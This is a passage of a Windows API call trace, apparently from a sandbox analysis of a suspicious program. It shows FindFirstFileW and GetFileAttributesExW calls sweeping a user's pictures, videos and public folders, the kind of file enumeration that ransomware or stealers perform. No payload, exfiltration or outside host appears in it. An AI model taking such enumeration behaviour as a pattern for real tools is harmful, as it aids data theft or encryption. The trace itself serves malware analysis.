GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\xTjJo96DDpNhn.png" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\xtjjo96ddpnhn.png"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ca79820, ftCreationTime.dwHighDateTime=0x1d418c1, ftLastAccessTime.dwLowDateTime=0x126a7270, ftLastAccessTime.dwHighDateTime=0x1d41885, ftLastWriteTime.dwLowDateTime=0x126a7270, ftLastWriteTime.dwHighDateTime=0x1d41885, nFileSizeHigh=0x0, nFileSizeLow=0x13cf5)) returned 1 [0039.495] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\xZwNFgm.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\xzwnfgm.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb69dce00, ftCreationTime.dwHighDateTime=0x1d412db, ftLastAccessTime.dwLowDateTime=0x3b0c2a10, ftLastAccessTime.dwHighDateTime=0x1d41ab6, ftLastWriteTime.dwLowDateTime=0x3b0c2a10, ftLastWriteTime.dwHighDateTime=0x1d41ab6, nFileSizeHigh=0x0, nFileSizeLow=0x757a)) returned 1 [0039.495] FindClose (in: hFindFile=0x37e3a0 | out: hFindFile=0x37e3a0) returned 1 [0039.496] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\desktop.ini" (normalized: "c:\\users\\eebsym5\\pictures\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ebeb90, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ebeb90, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec3e8400, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x1f8)) returned 1 [0039.496] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37e3a0 [0039.496] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\gODSMCuUdn.png" (normalized: "c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\godsmcuudn.png"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1b75e50, ftCreationTime.dwHighDateTime=0x1d41b38, ftLastAccessTime.dwLowDateTime=0x79ce4f70, ftLastAccessTime.dwHighDateTime=0x1d4149a, ftLastWriteTime.dwLowDateTime=0x79ce4f70, ftLastWriteTime.dwHighDateTime=0x1d4149a, nFileSizeHigh=0x0, nFileSizeLow=0xb672)) returned 1 [0039.496] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\nukHOa.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\nukhoa.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31c94bf0, ftCreationTime.dwHighDateTime=0x1d417cc, ftLastAccessTime.dwLowDateTime=0x3d503370, ftLastAccessTime.dwHighDateTime=0x1d41c73, ftLastWriteTime.dwLowDateTime=0x3d503370, ftLastWriteTime.dwHighDateTime=0x1d41c73, nFileSizeHigh=0x0, nFileSizeLow=0x4d6)) returned 1 [0039.496] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\oyfK.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\oyfk.jpg"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc65b5790, ftCreationTime.dwHighDateTime=0x1d41be6, ftLastAccessTime.dwLowDateTime=0xd2c43340, ftLastAccessTime.dwHighDateTime=0x1d41bae, ftLastWriteTime.dwLowDateTime=0xd2c43340, ftLastWriteTime.dwHighDateTime=0x1d41bae, nFileSizeHigh=0x0, nFileSizeLow=0x18e98)) returned 1 [0039.497] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\QZ9j-.png" (normalized: "c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\qz9j-.png"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bfc840, ftCreationTime.dwHighDateTime=0x1d41ad2, ftLastAccessTime.dwLowDateTime=0xff540c00, ftLastAccessTime.dwHighDateTime=0x1d41bd1, ftLastWriteTime.dwLowDateTime=0xff540c00, ftLastWriteTime.dwHighDateTime=0x1d41bd1, nFileSizeHigh=0x0, nFileSizeLow=0x122d8)) returned 1 [0039.497] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\vix_gezF8ko-.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\vix_gezf8ko-.jpg"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39ba7790, ftCreationTime.dwHighDateTime=0x1d41faa, ftLastAccessTime.dwLowDateTime=0xf03abe40, ftLastAccessTime.dwHighDateTime=0x1d41522, ftLastWriteTime.dwLowDateTime=0xf03abe40, ftLastWriteTime.dwHighDateTime=0x1d41522, nFileSizeHigh=0x0, nFileSizeLow=0x15621)) returned 1 [0039.497] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\WCugqKk5RxlbTM4reDQ.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\wcugqkk5rxlbtm4redq.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95acc460, ftCreationTime.dwHighDateTime=0x1d412e7, ftLastAccessTime.dwLowDateTime=0x4c91a4b0, ftLastAccessTime.dwHighDateTime=0x1d413a2, ftLastWriteTime.dwLowDateTime=0x4c91a4b0, ftLastWriteTime.dwHighDateTime=0x1d413a2, nFileSizeHigh=0x0, nFileSizeLow=0x12b9f)) returned 1 [0039.497] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\xDaqfb 0FFb.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eh0pjqt qm8\\xdaqfb 0ffb.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21d5ae80, ftCreationTime.dwHighDateTime=0x1d41625, ftLastAccessTime.dwLowDateTime=0x255f8790, ftLastAccessTime.dwHighDateTime=0x1d416e0, ftLastWriteTime.dwLowDateTime=0x255f8790, ftLastWriteTime.dwHighDateTime=0x1d416e0, nFileSizeHigh=0x0, nFileSizeLow=0xdb64)) returned 1 [0039.497] FindClose (in: hFindFile=0x37e3a0 | out: hFindFile=0x37e3a0) returned 1 [0039.497] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\EVfHSEpo11eW5.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\evfhsepo11ew5.jpg"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ccbb930, ftCreationTime.dwHighDateTime=0x1d41a5a, ftLastAccessTime.dwLowDateTime=0x1d88fc10, ftLastAccessTime.dwHighDateTime=0x1d414e5, ftLastWriteTime.dwLowDateTime=0x1d88fc10, ftLastWriteTime.dwHighDateTime=0x1d414e5, nFileSizeHigh=0x0, nFileSizeLow=0xa955)) returned 1 [0039.498] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\HGk7Np.png" (normalized: "c:\\users\\eebsym5\\pictures\\hgk7np.png"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd29c530, ftCreationTime.dwHighDateTime=0x1d4157f, ftLastAccessTime.dwLowDateTime=0x24240b00, ftLastAccessTime.dwHighDateTime=0x1d412a6, ftLastWriteTime.dwLowDateTime=0x24240b00, ftLastWriteTime.dwHighDateTime=0x1d412a6, nFileSizeHigh=0x0, nFileSizeLow=0x17be8)) returned 1 [0039.498] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\k8Qcy.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\k8qcy.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9eb4480, ftCreationTime.dwHighDateTime=0x1d41fa9, ftLastAccessTime.dwLowDateTime=0xa6fc2610, ftLastAccessTime.dwHighDateTime=0x1d41432, ftLastWriteTime.dwLowDateTime=0xa6fc2610, ftLastWriteTime.dwHighDateTime=0x1d41432, nFileSizeHigh=0x0, nFileSizeLow=0x7f12)) returned 1 [0039.498] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\Qcf9.png" (normalized: "c:\\users\\eebsym5\\pictures\\qcf9.png"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ea85820, ftCreationTime.dwHighDateTime=0x1d410d4, ftLastAccessTime.dwLowDateTime=0x564ea650, ftLastAccessTime.dwHighDateTime=0x1d41be6, ftLastWriteTime.dwLowDateTime=0x564ea650, ftLastWriteTime.dwHighDateTime=0x1d41be6, nFileSizeHigh=0x0, nFileSizeLow=0x84dd)) returned 1 [0039.498] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\wYpBBPn78QvIX3mzHn.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\wypbbpn78qvix3mzhn.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf913f0, ftCreationTime.dwHighDateTime=0x1d41c18, ftLastAccessTime.dwLowDateTime=0xe67cee40, ftLastAccessTime.dwHighDateTime=0x1d41cc1, ftLastWriteTime.dwLowDateTime=0xe67cee40, ftLastWriteTime.dwHighDateTime=0x1d41cc1, nFileSizeHigh=0x0, nFileSizeLow=0x12f62)) returned 1 [0039.499] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.499] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\printhood\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0039.499] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\recent\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0039.499] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\saved games\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.499] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\saved games\\desktop.ini" (normalized: "c:\\users\\eebsym5\\saved games\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ebeb90, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ebeb90, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec45a820, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x11a)) returned 1 [0039.499] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.499] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\searches\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.500] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\searches\\desktop.ini" (normalized: "c:\\users\\eebsym5\\searches\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ebeb90, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ebeb90, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec4346c0, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x20c)) returned 1 [0039.500] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\searches\\Everywhere.search-ms" (normalized: "c:\\users\\eebsym5\\searches\\everywhere.search-ms"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x8e98a30, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8e98a30, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0x27feeae6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xf8)) returned 1 [0039.500] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\eebsym5\\searches\\indexed locations.search-ms"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x8e98a30, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8e98a30, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0x27feeae6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xf8)) returned 1 [0039.500] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.500] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\sendto\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0039.500] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\start menu\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0039.500] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\templates\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0039.501] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\videos\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.501] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\videos\\0PzVf.mp4" (normalized: "c:\\users\\eebsym5\\videos\\0pzvf.mp4"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf03d3f0, ftCreationTime.dwHighDateTime=0x1d41344, ftLastAccessTime.dwLowDateTime=0xa06e4a70, ftLastAccessTime.dwHighDateTime=0x1d41dac, ftLastWriteTime.dwLowDateTime=0xa06e4a70, ftLastWriteTime.dwHighDateTime=0x1d41dac, nFileSizeHigh=0x0, nFileSizeLow=0x17a5e)) returned 1 [0039.501] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\videos\\6aDouzMxOw3ef7DSP-.mp4" (normalized: "c:\\users\\eebsym5\\videos\\6adouzmxow3ef7dsp-.mp4"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20e31d00, ftCreationTime.dwHighDateTime=0x1d40fd6, ftLastAccessTime.dwLowDateTime=0x3fdf4b80, ftLastAccessTime.dwHighDateTime=0x1d4107a, ftLastWriteTime.dwLowDateTime=0x3fdf4b80, ftLastWriteTime.dwHighDateTime=0x1d4107a, nFileSizeHigh=0x0, nFileSizeLow=0x7e41)) returned 1 [0039.501] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\videos\\AvIK.swf" (normalized: "c:\\users\\eebsym5\\videos\\avik.swf"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34bea2f0, ftCreationTime.dwHighDateTime=0x1d41c05, ftLastAccessTime.dwLowDateTime=0xabad61a0, ftLastAccessTime.dwHighDateTime=0x1d4118b, ftLastWriteTime.dwLowDateTime=0xabad61a0, ftLastWriteTime.dwHighDateTime=0x1d4118b, nFileSizeHigh=0x0, nFileSizeLow=0x12c74)) returned 1 [0039.501] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\videos\\avrcxqmp79rz1zwr-l\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37e3a0 [0039.502] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\videos\\avrcxqmp79rz1zwr-l\\iJcUEX2RgIDZ.mp4" (normalized: "c:\\users\\eebsym5\\videos\\avrcxqmp79rz1zwr-l\\ijcuex2rgidz.mp4"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26356710, ftCreationTime.dwHighDateTime=0x1d41691, ftLastAccessTime.dwLowDateTime=0xf675eae0, ftLastAccessTime.dwHighDateTime=0x1d41b9f, ftLastWriteTime.dwLowDateTime=0xf675eae0, ftLastWriteTime.dwHighDateTime=0x1d41b9f, nFileSizeHigh=0x0, nFileSizeLow=0xb3fd)) returned 1 [0039.502] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\videos\\avrcxqmp79rz1zwr-l\\s1xagxh3n\\\\*", lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0x37db50 [0039.502] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\videos\\avrcxqmp79rz1zwr-l\\s1xagxh3n\\ijeziyl\\\\*", lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0x37c730 [0039.502] FindClose (in: hFindFile=0x37c730 | out: hFindFile=0x37c730) returned 1 [0039.503] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\videos\\avrcxqmp79rz1zwr-l\\s1xagxh3n\\jXhmIqDeW.swf" (normalized: "c:\\users\\eebsym5\\videos\\avrcxqmp79rz1zwr-l\\s1xagxh3n\\jxhmiqdew.swf"), fInfoLevelId=0x0, lpFileInformation=0x1cdc34 | out: lpFileInformation=0x1cdc34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda0d39b0, ftCreationTime.dwHighDateTime=0x1d41633, ftLastAccessTime.dwLowDateTime=0x5c99b3f0, ftLastAccessTime.dwHighDateTime=0x1d41e9e, ftLastWriteTime.dwLowDateTime=0x5c99b3f0, ftLastWriteTime.dwHighDateTime=0x1d41e9e, nFileSizeHigh=0x0, nFileSizeLow=0x1b53)) returned 1 [0039.503] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\videos\\avrcxqmp79rz1zwr-l\\s1xagxh3n\\q5GYI.swf" (normalized: "c:\\users\\eebsym5\\videos\\avrcxqmp79rz1zwr-l\\s1xagxh3n\\q5gyi.swf"), fInfoLevelId=0x0, lpFileInformation=0x1cdc34 | out: lpFileInformation=0x1cdc34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bb8b3c0, ftCreationTime.dwHighDateTime=0x1d41e31, ftLastAccessTime.dwLowDateTime=0x747c2750, ftLastAccessTime.dwHighDateTime=0x1d41bd3, ftLastWriteTime.dwLowDateTime=0x747c2750, ftLastWriteTime.dwHighDateTime=0x1d41bd3, nFileSizeHigh=0x0, nFileSizeLow=0x5532)) returned 1 [0039.503] FindClose (in: hFindFile=0x37db50 | out: hFindFile=0x37db50) returned 1 [0039.504] FindClose (in: hFindFile=0x37e3a0 | out: hFindFile=0x37e3a0) returned 1 [0039.504] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\videos\\desktop.ini" (normalized: "c:\\users\\eebsym5\\videos\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8e98a30, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8e98a30, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec3e8400, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x1f8)) returned 1 [0039.504] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\videos\\o1Ccz.swf" (normalized: "c:\\users\\eebsym5\\videos\\o1ccz.swf"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58c7af0, ftCreationTime.dwHighDateTime=0x1d41806, ftLastAccessTime.dwLowDateTime=0xbe9fea40, ftLastAccessTime.dwHighDateTime=0x1d4172f, ftLastWriteTime.dwLowDateTime=0xbe9fea40, ftLastWriteTime.dwHighDateTime=0x1d4172f, nFileSizeHigh=0x0, nFileSizeLow=0x659b)) returned 1 [0039.505] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37e3a0 [0039.505] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\B32hiOe.swf" (normalized: "c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\b32hioe.swf"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39b73050, ftCreationTime.dwHighDateTime=0x1d41d46, ftLastAccessTime.dwLowDateTime=0xe3ad6150, ftLastAccessTime.dwHighDateTime=0x1d41e73, ftLastWriteTime.dwLowDateTime=0xe3ad6150, ftLastWriteTime.dwHighDateTime=0x1d41e73, nFileSizeHigh=0x0, nFileSizeLow=0xbaca)) returned 1 [0039.505] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\cxb6_or2bF.swf" (normalized: "c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\cxb6_or2bf.swf"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1ef07d0, ftCreationTime.dwHighDateTime=0x1d41a82, ftLastAccessTime.dwLowDateTime=0x85b58f20, ftLastAccessTime.dwHighDateTime=0x1d41e12, ftLastWriteTime.dwLowDateTime=0x85b58f20, ftLastWriteTime.dwHighDateTime=0x1d41e12, nFileSizeHigh=0x0, nFileSizeLow=0x1795c)) returned 1 [0039.505] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\d1nH 3xB2.swf" (normalized: "c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\d1nh 3xb2.swf"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce54ee30, ftCreationTime.dwHighDateTime=0x1d4154b, ftLastAccessTime.dwLowDateTime=0x1fe2a6c0, ftLastAccessTime.dwHighDateTime=0x1d41de9, ftLastWriteTime.dwLowDateTime=0x1fe2a6c0, ftLastWriteTime.dwHighDateTime=0x1d41de9, nFileSizeHigh=0x0, nFileSizeLow=0xeed)) returned 1 [0039.506] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\IXPFlcjz_LESFm.mp4" (normalized: "c:\\users\\eebsym5\\videos\\_vk5pq kl98yoyv3\\ixpflcjz_lesfm.mp4"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf57d6270, ftCreationTime.dwHighDateTime=0x1d411cd, ftLastAccessTime.dwLowDateTime=0xe84034a0, ftLastAccessTime.dwHighDateTime=0x1d41035, ftLastWriteTime.dwLowDateTime=0xe84034a0, ftLastWriteTime.dwHighDateTime=0x1d41035, nFileSizeHigh=0x0, nFileSizeLow=0x2eef)) returned 1 [0039.507] FindClose (in: hFindFile=0x37e3a0 | out: hFindFile=0x37e3a0) returned 1 [0039.507] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.507] FindClose (in: hFindFile=0x37be48 | out: hFindFile=0x37be48) returned 1 [0039.507] FindFirstFileW (in: lpFileName="c:\\users\\public\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37be48 [0039.507] FindFirstFileW (in: lpFileName="c:\\users\\public\\desktop\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.508] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.508] FindFirstFileW (in: lpFileName="c:\\users\\public\\documents\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.508] FindFirstFileW (in: lpFileName="c:\\users\\public\\documents\\my music\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0xffffffff [0039.508] FindFirstFileW (in: lpFileName="c:\\users\\public\\documents\\my pictures\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0xffffffff [0039.509] FindFirstFileW (in: lpFileName="c:\\users\\public\\documents\\my videos\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0xffffffff [0039.509] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.509] FindFirstFileW (in: lpFileName="c:\\users\\public\\downloads\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.510] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.510] FindFirstFileW (in: lpFileName="c:\\users\\public\\favorites\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.510] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.510] FindFirstFileW (in: lpFileName="c:\\users\\public\\libraries\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.511] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.511] FindFirstFileW (in: lpFileName="c:\\users\\public\\music\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.511] FindFirstFileW (in: lpFileName="c:\\users\\public\\music\\sample music\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37e3a0 [0039.529] FindClose (in: hFindFile=0x37e3a0 | out: hFindFile=0x37e3a0) returned 1 [0039.529] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.529] FindFirstFileW (in: lpFileName="c:\\users\\public\\pictures\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.529] FindFirstFileW (in: lpFileName="c:\\users\\public\\pictures\\sample pictures\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37e3a0 [0039.543] FindClose (in: hFindFile=0x37e3a0 | out: hFindFile=0x37e3a0) returned 1 [0039.543] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.543] FindFirstFileW (in: lpFileName="c:\\users\\public\\recorded tv\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.554] FindFirstFileW (in: lpFileName="c:\\users\\public\\recorded tv\\sample media\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37e3a0 [0039.555] FindClose (in: hFindFile=0x37e3a0 | out: hFindFile=0x37e3a0) returned 1 [0039.555] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.555] FindFirstFileW (in: 